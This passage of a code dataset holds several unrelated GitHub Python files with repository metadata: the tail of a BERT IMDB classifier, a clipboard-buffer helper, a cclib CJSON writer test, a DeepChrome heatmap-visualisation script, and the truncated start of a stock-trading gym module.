to the CPU\n logits = logits.detach().cpu().numpy()\n label_ids = b_labels.to('cpu').numpy()\n \n # compute accuracy by comparing output logits with labels\n tmp_eval_accuracy = flat_accuracy(logits, label_ids)\n eval_accuracy += tmp_eval_accuracy\n nb_eval_steps += 1\n\n print(\" Accuracy: {0:.2f}\".format(eval_accuracy/nb_eval_steps))\n print(\" Validation took: {:}\".format(format_time(time.time() - t0)))\n\nprint(\"\")\nprint(\"Training complete!\")\n\n\n\n# test\n\n# set start time\nt0 = time.time()\n\n# switch to evaluation mode\nmodel.eval()\n\n# initialize variables\neval_loss, eval_accuracy = 0, 0\nnb_eval_steps, nb_eval_examples = 0, 0\n\n# fetch batches from the dataloader\nfor step, batch in enumerate(test_dataloader):\n # show progress information\n if step % 100 == 0 and not step == 0:\n elapsed = format_time(time.time() - t0)\n print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(test_dataloader), elapsed))\n\n # move the batch to the GPU\n batch = tuple(t.to(device) for t in batch)\n \n # unpack the data from the batch\n b_input_ids, b_input_mask, b_labels = batch\n \n # do not compute gradients\n with torch.no_grad(): \n # perform forward pass\n outputs = model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask)\n \n # get the logits\n logits = outputs[0]\n\n # move data to the CPU\n logits = logits.detach().cpu().numpy()\n label_ids = b_labels.to('cpu').numpy()\n \n # compute accuracy by comparing output logits with labels\n tmp_eval_accuracy = flat_accuracy(logits, label_ids)\n eval_accuracy += tmp_eval_accuracy\n nb_eval_steps += 1\n\nprint(\"\")\nprint(\"Accuracy: {0:.2f}\".format(eval_accuracy/nb_eval_steps))\nprint(\"Test took: {:}\".format(format_time(time.time() - t0)))", "repo_name": "jangsejong/STUDY", "sub_path": "keras_Dacon/news/BERT_IMDB_.py", "file_name": "BERT_IMDB_.py", "file_ext": "py", "file_size_in_byte": 9808, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer.from_pretrained", "line_number": 33, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.stats.describe", "line_number": 38, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 38, "usage_type": "name"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.device", 
"line_number": 112, "usage_type": "call"}, {"api_name": "transformers.BertForSequenceClassification.from_pretrained", "line_number": 114, "usage_type": "call"}, {"api_name": "transformers.BertForSequenceClassification", "line_number": 114, "usage_type": "name"}, {"api_name": "transformers.AdamW", "line_number": 116, "usage_type": "call"}, {"api_name": "transformers.get_linear_schedule_with_warmup", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 143, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 151, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 168, "usage_type": "call"}, {"api_name": "time.time", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 221, "usage_type": "call"}, {"api_name": "time.time", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 249, "usage_type": "call"}, {"api_name": "time.time", "line_number": 268, "usage_type": "call"}, {"api_name": "time.time", "line_number": 278, "usage_type": "call"}, {"api_name": "time.time", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 301, "usage_type": "call"}, {"api_name": "time.time", "line_number": 321, "usage_type": "call"}]} +{"seq_id": "16242576285", "text": "from collections import deque\n\nfrom pynput import keyboard;\n\nimport clipboard as clipboard;\nfrom src.providers.KeyboardProvider import KeyboardProvider\n\nimport src.utils.logger as logger;\n\nclass ClipboardProvider():\n def __init__(self):\n self.buffer = deque(5*[0], 5);\n self.keyboard = KeyboardProvider()\n\n def copy(self, *args):\n # Save existing clipboard value to keep original state\n original = clipboard.paste();\n\n self.pressCopy()\n\n # Save newly copied value to internal buffer\n copied = clipboard.paste();\n\n # Restore clipboard state\n clipboard.copy(original);\n\n if (\n not copied\n or copied.isspace()\n or copied == original\n ):\n return;\n\n self.buffer.append(copied);\n\n def paste(self, *args):\n\n # Fetch copied value from buffer\n copied = None;\n try:\n copied = self.buffer.pop();\n except IndexError:\n logger.log(\"FunctionProvider: Notice -> Nothing to paste\");\n return;\n\n if not copied or copied.isspace():\n return;\n\n # Save existing clipboard value to keep original state\n original = clipboard.paste();\n\n clipboard.copy(copied);\n\n # Paste\n self.pressPaste();\n\n # Restore clipboard state\n clipboard.copy(original);\n\n def save(self, structure):\n self.buffer.append(structure);\n\n def pressCopy(self, *args):\n self.keyboard.pressWithModifier('c', keyboard.Key.ctrl_l)\n\n def pressPaste(self, *args):\n self.keyboard.pressWithModifier('v', keyboard.Key.ctrl_l)\n", "repo_name": "lphaap/acrux", "sub_path": "src/providers/ClipboardProvider.py", "file_name": 
"ClipboardProvider.py", "file_ext": "py", "file_size_in_byte": 1655, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 12, "usage_type": "call"}, {"api_name": "src.providers.KeyboardProvider.KeyboardProvider", "line_number": 13, "usage_type": "call"}, {"api_name": "clipboard.paste", "line_number": 17, "usage_type": "call"}, {"api_name": "clipboard.paste", "line_number": 22, "usage_type": "call"}, {"api_name": "clipboard.copy", "line_number": 25, "usage_type": "call"}, {"api_name": "src.utils.logger.log", "line_number": 43, "usage_type": "call"}, {"api_name": "src.utils.logger", "line_number": 43, "usage_type": "name"}, {"api_name": "clipboard.paste", "line_number": 50, "usage_type": "call"}, {"api_name": "clipboard.copy", "line_number": 52, "usage_type": "call"}, {"api_name": "clipboard.copy", "line_number": 58, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 64, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "72785609764", "text": "import json\nimport os\nimport unittest\nfrom math import sqrt\n\nimport cclib\n\n__filedir__ = os.path.dirname(__file__)\n__filepath__ = os.path.realpath(__filedir__)\n__datadir__ = os.path.join(__filepath__, \"..\", \"..\")\n\n\nclass CJSONWriterTest(unittest.TestCase):\n \"\"\"Unit tests for the CJSON writer.\"\"\"\n\n def test_init(self):\n \"\"\"Does the class initialize correctly?\"\"\"\n fpath = os.path.join(__datadir__, \"data/ADF/basicADF2007.01/dvb_gopt.adfout\")\n data = cclib.io.ccread(fpath)\n cjson = cclib.io.cjsonwriter.CJSON(data)\n\n # The object should keep the ccData instance passed to its constructor.\n assert cjson.ccdata == data\n\n def test_cjson_generation(self):\n \"\"\"Does the CJSON format get generated properly?\"\"\"\n fpath = os.path.join(__datadir__, \"data/ADF/basicADF2007.01/NH3.adfout\")\n data = cclib.io.ccread(fpath)\n\n cjson = cclib.io.cjsonwriter.CJSON(data).generate_repr()\n\n # The data available in the cjson and ccdata objects should be equal.\n json_data = json.loads(cjson)\n number_of_atoms = json_data['properties']['number of atoms']\n assert number_of_atoms == data.natom\n\n dipole_moment = json_data['properties']['total dipole moment']\n assert round(abs(dipole_moment - sqrt(sum(data.moments[1] ** 2))), 7) == 0\n\n # Ensure the bond connectivity index starts from 0\n bonds = json_data.get('bonds', None)\n assert bonds is not None\n indices = bonds['connections']['index']\n assert min(indices) == 0\n assert max(indices) < number_of_atoms\n\n def test_zero_dipole_moment(self):\n \"\"\"Does the CJSON writer handle zero dipole moment correctly?\"\"\"\n fpath = os.path.join(__datadir__, \"data/GAMESS/basicGAMESS-US2017/C_bigbasis.out\")\n data = cclib.io.ccopen(fpath).parse()\n\n cjson = cclib.io.cjsonwriter.CJSON(data).generate_repr()\n\n json_data = json.loads(cjson)\n assert round(abs(json_data[\"properties\"]['total dipole moment']), 7) == 0\n\n def test_missing_dipole_moment(self):\n \"\"\"Does the CJSON writer handle missing properties correctly?\"\"\"\n fpath = os.path.join(__datadir__, \"data/GAMESS/basicGAMESS-US2017/C_bigbasis.out\")\n data = cclib.io.ccopen(fpath).parse()\n del data.moments\n\n cjson = 
cclib.io.cjsonwriter.CJSON(data).generate_repr()\n\n json_data = json.loads(cjson)\n assert \"total dipole moment\" not in json_data[\"properties\"]\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "cclib/cclib", "sub_path": "test/io/testcjsonwriter.py", "file_name": "testcjsonwriter.py", "file_ext": "py", "file_size_in_byte": 2538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 286, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cclib.io.ccread", "line_number": 19, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cclib.io.cjsonwriter.CJSON", "line_number": 20, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cclib.io.ccread", "line_number": 28, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cclib.io.cjsonwriter.CJSON", "line_number": 30, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 33, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cclib.io.ccopen", "line_number": 50, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cclib.io.cjsonwriter.CJSON", "line_number": 52, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 52, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cclib.io.ccopen", "line_number": 60, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cclib.io.cjsonwriter.CJSON", "line_number": 63, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 63, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 65, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "15097045165", "text": "import torch \nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport argparse as ap\nimport time as time\nimport random\nimport math\nimport scipy \nimport os\n\ndef set_device():\n # -- set the device used\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(f\"0. 
Using {device} device!\")\n return device\n\n# -- function for loading in the parsed data into tensor form\ndef load_data(ct, ds):\n num_windows = 100\n inputs = []\n\n xy = torch.from_numpy(np.loadtxt(f'{ds}/train.csv', delimiter=\",\",dtype=np.float32))\n num_rows = len(xy)\n num_cols = len(xy[0])\n num_genes = num_rows / num_windows\n marker = 0 \n data = {}\n num_zeros = 0\n num_ones = 0\n\n # -- set entries for data\n data[0] = []\n data[1] = []\n\n for i in range(len(xy)):\n if xy[i][num_cols-1]==0:\n num_zeros += 1\n if xy[i][num_cols-1]==1:\n num_ones += 1\n if (i+1) % num_windows==0:\n if xy[i][num_cols-1]==0:\n data[0].append((xy[i-99:i+1,2:num_cols-1], xy[i-99:i+1,[num_cols-1]]))\n if xy[i][num_cols-1]==1:\n data[1].append((xy[i-99:i+1,2:num_cols-1], xy[i-99:i+1,[num_cols-1]]))\n\n pos_weights = torch.tensor([num_zeros / num_ones])\n random_zero_idx = random.randint(0, len(data[0])-1)\n random_one_idx = random.randint(0, len(data[1])-1)\n inputs.append(ct) # -- use cell type to mark each input \n inputs.append(data[0][random_zero_idx])\n inputs.append(data[1][random_one_idx])\n # print(inputs[0][1][0][0])\n return inputs, pos_weights\n\ndef set_hyperparams(num_windows, n_e, hp_specs):\n # -- spec values \n width = num_windows\n learning_rate = 0.001\n num_epochs = n_e\n num_filters = 50\n hidden_layer_units = {\"first\": 625, \"second\": 125}\n\n if hp_specs == 4: \n filter_size = 10 \n pool_size = 5 \n elif hp_specs == 1: \n filter_size = 5\n pool_size = 2\n elif hp_specs == 2: \n filter_size = 5\n pool_size = 5\n elif hp_specs == 3:\n filter_size = 10 \n pool_size = 2\n\n return width, hidden_layer_units, num_filters, filter_size, pool_size, num_epochs, learning_rate\n\n# -- define convnet class\nclass ConvNet(nn.Module):\n def __init__(self, width, num_filters, filter_size, pool_size, hidden_layer_units:dict): \n super(ConvNet, self).__init__()\n self.conv = nn.Conv1d(in_channels=5, out_channels=num_filters, kernel_size=filter_size)\n self.pool = nn.MaxPool1d(kernel_size=pool_size)\n self.dropout = nn.Dropout(p=0.5)\n self.fc1 = nn.Linear(math.ceil((width-filter_size)/pool_size)*num_filters, hidden_layer_units[\"first\"])\n self.fc2 = nn.Linear(hidden_layer_units[\"first\"], hidden_layer_units[\"second\"])\n self.fc3 = nn.Linear(hidden_layer_units[\"second\"], 1)\n self.width = width\n self.filter_size = filter_size\n self.pool_size = pool_size \n self.num_filters = num_filters\n def forward(self, x): \n x = self.conv(x)\n x = F.relu(x)\n x = self.pool(x)\n x = x.view(math.ceil((self.width-self.filter_size)/self.pool_size)*self.num_filters)\n x = self.dropout(x)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.relu(x)\n x = self.fc3(x) \n return x\n\n\n# -- function for optimization \ndef opt(inputs:list, pos_weights, num_epochs, model_path, device, width, num_filters, filter_size, pool_size, hidden_layer_units):\n\n # -- dictionaries for all cell types\n outputs_dict = {}\n loss_dict = {}\n expressions_dict = {}\n\n # -- unpack inputs\n ct = inputs[0]\n\n # -- add in an empty list for the ct\n outputs_dict[ct] = []\n loss_dict[ct] = []\n expressions_dict[ct] = []\n\n # -- create the model \n model = ConvNet(width=width, num_filters=num_filters, filter_size=filter_size, pool_size=pool_size, hidden_layer_units=hidden_layer_units)\n\n for i in range(1, len(inputs)): # -- enter the training loop \n\n # -- create loss list for each cell type \n losses = []\n\n # -- load in model's parameters for EACH cell type \n 
model.load_state_dict(torch.load(f'{model_path}/{ct}_params.pth'))\n model.eval()\n\n # -- set up custom parameter group for optimizer\n s = inputs[i][0]\n s.requires_grad_(True)\n bin_list = {s}\n\n # -- set universal hyperparams for all cell types \n learning_rate=0.1\n momentum=0.9\n lda=0.009\n \n # -- set optimizer and loss function \n optimizer = torch.optim.SGD(bin_list, lr=learning_rate, momentum=momentum, weight_decay=lda)\n pos_weights = pos_weights.to(device)\n criterion = nn.BCEWithLogitsLoss(pos_weight=pos_weights)\n\n for epoch in range(num_epochs):\n samples = inputs[i][0].permute(1,0)\n samples = samples.to(device)\n labels = inputs[i][1][0]\n labels = labels.to(device)\n model.to(device)\n predicted = model(samples)\n loss = criterion(predicted, labels) \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # -- print the loss\n print (f'Epoch [{epoch+1}/{num_epochs}], Loss: {loss.item():.4f}')\n losses.append(loss.item())\n \n #-- get the output\n pg = optimizer.param_groups\n output = pg[0]['params'][0].detach().numpy() \n outputs_dict[ct].append(output)\n loss_dict[ct].append(losses)\n expressions_dict[ct].append(inputs[i][1][0].item())\n\n return outputs_dict, loss_dict, expressions_dict\n\ndef norm(raw_outputs_tuple, ct):\n all_normalized_arrs = {}\n\n # -- get the maximum of all the features \n curr_max = 0\n for sub_array in raw_outputs_tuple:\n if np.amax(sub_array, axis=0) > curr_max:\n curr_max = np.amax(sub_array, axis=0) \n\n norm_array = []\n for sub_array in raw_outputs_tuple:\n normalized = np.clip(sub_array / curr_max, 0, 1) # -- clamp to range of [0,1] and normalize with max\n norm_array.append(normalized)\n norm_array = np.array(norm_array)\n\n all_normalized_arrs[ct] = norm_array\n\n return all_normalized_arrs\n\ndef plot_heatmap(cell_type, all_normalized_arrs, mods_to_frequencies, color_list, histone_mods, bins, expression_val, o_dir):\n\n # -- plot the graph for heatmap + barplot \n f, a = plt.subplots(2, 1, figsize=(15,6) ,layout='constrained')\n\n # -- set custom titles based on expression value for the given sample \n a[0].set_title(f'Bar Graph of Active Bins per Modification for {cell_type}', fontsize=10)\n a[0].bar(histone_mods, mods_to_frequencies, color=color_list, width=0.2)\n\n # -- set custom titles based on expression value for the given sample \n if expression_val == 1:\n a[1].set_title(f'Heatmap of Bins for {cell_type}. Gene Expression = High', fontsize=10)\n elif expression_val == 0:\n a[1].set_title(f'Heatmap of Bins for {cell_type}. 
Gene Expression = Low', fontsize=10)\n \n # -- create custom colorbar (not discretized)\n img = a[1].imshow(all_normalized_arrs)\n cbar = a[1].figure.colorbar(img, ax=a[1], shrink=0.2, pad=0.01)\n cbar.ax.set_ylabel('', rotation=-90, va=\"bottom\")\n\n # -- show all the ticks and label them with respective entries (if specified)\n a[1].set_yticks(np.arange(0, 5, 1)-0.5, labels=histone_mods)\n a[1].set_xticks(np.arange(-1.5, 99, 1)+1)\n a[1].tick_params(axis='y', which='major', labelsize=6)\n a[1].tick_params(axis='x', which='major', labelsize=2)\n\n # -- create grid to distinguish between cells\n a[1].grid(color='black', visible=True, which='both',linestyle='-',linewidth=0.3)\n\n # -- save the file to specified output folder\n if o_dir != 'DELETE':\n plt.savefig(f'{o_dir}/{cell_type}_{expression_val}_heatmap.png')\n \n# == optional function for plotting loss (atm evidently all over the place)\ndef plot_loss(cell_type, num_epochs, loss):\n f, a = plt.subplots(layout='constrained') \n f.suptitle(f'Evaluation Loss for {cell_type}') \n a.plot(num_epochs, loss, label='Loss')\n a.set_xlabel('Number of Epochs')\n a.set_ylabel('Loss')\n a.legend() \n\ndef main():\n\n # -- argparser: what args to look for? \n # -- ** note that -h can be used to reference what these flags are / their meaning\n # -- input list of cell types to parse and visualize\n parser = ap.ArgumentParser(prog='Visualization of Deepchrome!', description='Please specify the cell-types to visualize below.')\n parser.add_argument('-d', type=str, help='-> input name of dataset directory to use', nargs=1)\n parser.add_argument('-sm', type=str, help= '-> input name of folder where saved model params are located')\n parser.add_argument('-e', type=int, help='-> input number of epochs that the model should optimize through', nargs=1)\n parser.add_argument('-hp', type=int, help='-> input 1 for (5,2) 2 for (5,5) 3 for (10,2) 4 for (10,5) to specify hp',default=4)\n parser.add_argument('-o',type=str, help='-> input name of folder where results should be saved')\n args = vars(parser.parse_args())\n\n # -- set necessary parameters from parsed in information\n data_directory = args['d'][0]\n num_epochs = args['e'][0]\n model_path = args['sm']\n hp_specs = args['hp']\n output_dir = args['o']\n\n lowest_dirs = []\n for root, dirs, files_ignore in os.walk(data_directory): # -- get lowest directories \n if not dirs: \n lowest_dirs.append(root)\n \n all_cell_types = next(os.walk(data_directory))[1] # -- this obtains the cell types\n eval_datasets = [] # -- list of the (ct, corres. 
to lowest possible directory) -- without reaching into files\n\n marker = 0\n for dirs in lowest_dirs:\n # -- run the functions proper with parsed in data from above\n device = set_device()\n data_outputs, pos_weights = load_data(ds=dirs, ct=all_cell_types[marker])\n width, hidden_layer_units, num_filters, filter_size, pool_size, num_epochs, learning_rate = set_hyperparams(num_windows=100, n_e=num_epochs, hp_specs=hp_specs)\n outputs_dict, loss_dict, expressions_dict = opt(inputs=data_outputs, pos_weights=pos_weights, num_epochs=num_epochs, model_path=model_path, device=device, width=width, num_filters=num_filters, filter_size=filter_size, pool_size=pool_size, hidden_layer_units=hidden_layer_units)\n \n # -- define parameters for plotting functions\n histone_mods = ['H3K27me3 (R)', 'H3K36me3 (P)','H3K4me1 (DP)', 'H3K4me3 (P)', 'H3K9me3 (R)']\n bins = np.linspace(0, 99, 100).astype(int)\n\n for ct, raw_output_list in outputs_dict.items():\n for idx, item in enumerate(raw_output_list): \n # -- normalize the outputs \n all_normalized_dict = norm(raw_outputs_tuple=item, ct=ct)\n \n # -- plot everything \n d = np.swapaxes(all_normalized_dict[ct], 1, 0)\n mods_to_frequencies = []\n for row in d:\n frequency = 0\n for bins in row:\n if bins >= 0.25: \n frequency+=1\n mods_to_frequencies.append(frequency) \n avg = np.mean(mods_to_frequencies)\n color_list = []\n for frequencies in mods_to_frequencies:\n if frequencies > avg:\n color_list.append(\"black\")\n elif frequencies < avg:\n color_list.append(\"gray\")\n\n plot_heatmap(cell_type=ct, all_normalized_arrs=d, mods_to_frequencies=mods_to_frequencies, color_list=color_list, \n histone_mods=histone_mods, bins=bins, expression_val=expressions_dict[ct][idx], o_dir=output_dir)\n\n # -- update the marker \n marker+=1\n\nif __name__ == '__main__':\n main()", "repo_name": "nickkim1/deepchrome_reimplementation", "sub_path": "optim.py", "file_name": "optim.py", "file_ext": "py", "file_size_in_byte": 12034, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.device", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 49, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 50, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 88, "usage_type": "call"}, 
{"api_name": "torch.nn.Linear", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 97, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.nn.BCEWithLogitsLoss", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.amax", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 243, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 259, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}]} +{"seq_id": "42746866606", "text": "import yfinance as yf\n\nimport gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport numpy as np\n\nfrom ta import add_all_ta_features\nfrom ta.utils import dropna\n\nfrom trading_gym.feature_gen import FeatureGenerator\n\n\nfrom tf_agents.environments import py_environment\nfrom tf_agents.environments import tf_environment\nfrom tf_agents.environments import tf_py_environment\nfrom tf_agents.environments import utils\nfrom tf_agents.specs import array_spec\nfrom tf_agents.environments import wrappers\nfrom tf_agents.environments import suite_gym\nfrom tf_agents.trajectories import time_step as ts\n\n\nSTART_INDEX = 0\nMAX_INDEX = 2000\nWINDOW = 200\nAVAILABLE_TICKERS = [\"MSFT\"]\n\n\ndef fetch_data(period, intervall):\n states = []\n for ticker in AVAILABLE_TICKERS:\n states.append(yf.Ticker(ticker).history(\n period=period, interval=intervall, auto_adjust=True).reset_index())\n return states\n\n\nclass Bank():\n 
